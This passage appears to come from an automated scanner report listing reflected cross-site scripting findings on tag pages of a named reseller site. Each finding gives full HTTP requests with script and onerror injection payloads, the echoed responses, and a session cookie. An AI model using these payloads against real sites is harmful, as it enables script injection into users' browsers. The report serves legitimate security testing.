User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/hotel
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:56:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag2bef0<script>alert(1)</script>affc5111a192e5fa8/hotel?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4299. http://www.resellerbase.com/tag/hotel [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/hotel

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4fa41<img%20src%3da%20onerror%3dalert(1)>305ecb13fe03012a2 was submitted in the REST URL parameter 2. This input was echoed as 4fa41<img src=a onerror=alert(1)>305ecb13fe03012a2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/hotel4fa41<img%20src%3da%20onerror%3dalert(1)>305ecb13fe03012a2?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/hotel
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9800

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: hotel
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : hotel4fa41<img src=a onerror=alert(1)>305ecb13fe03012a2]</td>
...[SNIP]...

2.4300. http://www.resellerbase.com/tag/hotel [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/hotel

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 45c79<img%20src%3da%20onerror%3dalert(1)>101b5e39c75 was submitted in the REST URL parameter 2. This input was echoed as 45c79<img src=a onerror=alert(1)>101b5e39c75 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/hotel45c79<img%20src%3da%20onerror%3dalert(1)>101b5e39c75 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/ian-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:56:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9788

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: hotel
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : hotel45c79<img src=a onerror=alert(1)>101b5e39c75]</td>
...[SNIP]...

2.4301. http://www.resellerbase.com/tag/hotel [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/hotel

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload d3107</title><img%20src%3da%20onerror%3dalert(1)>c605c78512b10ca34 was submitted in the REST URL parameter 2. This input was echoed as d3107</title><img src=a onerror=alert(1)>c605c78512b10ca34 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/hoteld3107</title><img%20src%3da%20onerror%3dalert(1)>c605c78512b10ca34?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/hotel
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9816

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: hoteld3107</title><img src=a onerror=alert(1)>c605c78512b10ca34</title>
...[SNIP]...

2.4302. http://www.resellerbase.com/tag/hotel [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/hotel

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 38565</title><img%20src%3da%20onerror%3dalert(1)>b44a57c3661 was submitted in the REST URL parameter 2. This input was echoed as 38565</title><img src=a onerror=alert(1)>b44a57c3661 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/hotel38565</title><img%20src%3da%20onerror%3dalert(1)>b44a57c3661 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/ian-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:56:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9804

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: hotel38565</title><img src=a onerror=alert(1)>b44a57c3661</title>
...[SNIP]...

2.4303. http://www.resellerbase.com/tag/internet+access [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/internet+access

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f4ab8<script>alert(1)</script>96752948d03 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tagf4ab8<script>alert(1)</script>96752948d03/internet+access HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/telebay-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:55:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tagf4ab8<script>alert(1)</script>96752948d03/internet+access was not found on this server.</p>
...[SNIP]...

2.4304. http://www.resellerbase.com/tag/internet+access [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/internet+access

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1368d<script>alert(1)</script>c922b93dc5d8a9842 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag1368d<script>alert(1)</script>c922b93dc5d8a9842/internet+access?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/internet+access
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:56:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag1368d<script>alert(1)</script>c922b93dc5d8a9842/internet+access?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4305. http://www.resellerbase.com/tag/internet+access [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/internet+access

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 14a5c<img%20src%3da%20onerror%3dalert(1)>a472841738ad49d8a was submitted in the REST URL parameter 2. This input was echoed as 14a5c<img src=a onerror=alert(1)>a472841738ad49d8a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/internet+access14a5c<img%20src%3da%20onerror%3dalert(1)>a472841738ad49d8a?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/internet+access
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:56:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9820

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: inter
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : internet access14a5c<img src=a onerror=alert(1)>a472841738ad49d8a]</td>
...[SNIP]...

2.4306. http://www.resellerbase.com/tag/internet+access [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/internet+access

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload bbc90</title><img%20src%3da%20onerror%3dalert(1)>71a8f287f30 was submitted in the REST URL parameter 2. This input was echoed as bbc90</title><img src=a onerror=alert(1)>71a8f287f30 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/internet+accessbbc90</title><img%20src%3da%20onerror%3dalert(1)>71a8f287f30 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/telebay-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:55:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9824

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: internet accessbbc90</title><img src=a onerror=alert(1)>71a8f287f30</title>
...[SNIP]...

2.4307. http://www.resellerbase.com/tag/internet+access [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/internet+access

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d257f<img%20src%3da%20onerror%3dalert(1)>a502038acbd was submitted in the REST URL parameter 2. This input was echoed as d257f<img src=a onerror=alert(1)>a502038acbd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/internet+accessd257f<img%20src%3da%20onerror%3dalert(1)>a502038acbd HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/telebay-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:55:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9808

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: inter
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : internet accessd257f<img src=a onerror=alert(1)>a502038acbd]</td>
...[SNIP]...

2.4308. http://www.resellerbase.com/tag/internet+access [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/internet+access

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload f0428</title><img%20src%3da%20onerror%3dalert(1)>ff2a43c86b7feb432 was submitted in the REST URL parameter 2. This input was echoed as f0428</title><img src=a onerror=alert(1)>ff2a43c86b7feb432 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/internet+accessf0428</title><img%20src%3da%20onerror%3dalert(1)>ff2a43c86b7feb432?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/internet+access
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:56:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9836

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: internet accessf0428</title><img src=a onerror=alert(1)>ff2a43c86b7feb432</title>
...[SNIP]...

2.4309. http://www.resellerbase.com/tag/master+resell+rights [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/master+resell+rights

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 71e60<script>alert(1)</script>ca99623d27979aa43 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag71e60<script>alert(1)</script>ca99623d27979aa43/master+resell+rights?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/master+resell+rights
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:55:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag71e60<script>alert(1)</script>ca99623d27979aa43/master+resell+rights?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4310. http://www.resellerbase.com/tag/master+resell+rights [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/master+resell+rights

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e288a<script>alert(1)</script>ffd50b58fa2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tage288a<script>alert(1)</script>ffd50b58fa2/master+resell+rights HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/how-to-win-with-online-reseller-products.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:55:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tage288a<script>alert(1)</script>ffd50b58fa2/master+resell+rights was not found on this server.</p>
...[SNIP]...

2.4311. http://www.resellerbase.com/tag/master+resell+rights [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/master+resell+rights

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 1d289</title><img%20src%3da%20onerror%3dalert(1)>34b20c9963c was submitted in the REST URL parameter 2. This input was echoed as 1d289</title><img src=a onerror=alert(1)>34b20c9963c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/master+resell+rights1d289</title><img%20src%3da%20onerror%3dalert(1)>34b20c9963c HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/how-to-win-with-online-reseller-products.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:55:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9834

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: master resell rights1d289</title><img src=a onerror=alert(1)>34b20c9963c</title>
...[SNIP]...

2.4312. http://www.resellerbase.com/tag/master+resell+rights [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/master+resell+rights

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 40f9a<img%20src%3da%20onerror%3dalert(1)>c5038c1fda was submitted in the REST URL parameter 2. This input was echoed as 40f9a<img src=a onerror=alert(1)>c5038c1fda in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/master+resell+rights40f9a<img%20src%3da%20onerror%3dalert(1)>c5038c1fda HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/how-to-win-with-online-reseller-products.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:55:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9816

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: maste
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : master resell rights40f9a<img src=a onerror=alert(1)>c5038c1fda]</td>
...[SNIP]...

2.4313. http://www.resellerbase.com/tag/mobile [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/mobile

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 291b2<script>alert(1)</script>81d292ef881 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag291b2<script>alert(1)</script>81d292ef881/mobile HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/mediaplazza-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:56:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag291b2<script>alert(1)</script>81d292ef881/mobile was not found on this server.</p>
...[SNIP]...

2.4314. http://www.resellerbase.com/tag/mobile [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/mobile

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c1b8e<script>alert(1)</script>4fe066e3df3b2d656 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tagc1b8e<script>alert(1)</script>4fe066e3df3b2d656/mobile?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/mobile
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:57:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tagc1b8e<script>alert(1)</script>4fe066e3df3b2d656/mobile?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4315. http://www.resellerbase.com/tag/mobile [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/mobile

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 16b1f</title><img%20src%3da%20onerror%3dalert(1)>657f07635e57e6b6a was submitted in the REST URL parameter 2. This input was echoed as 16b1f</title><img src=a onerror=alert(1)>657f07635e57e6b6a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/mobile16b1f</title><img%20src%3da%20onerror%3dalert(1)>657f07635e57e6b6a?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/mobile
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
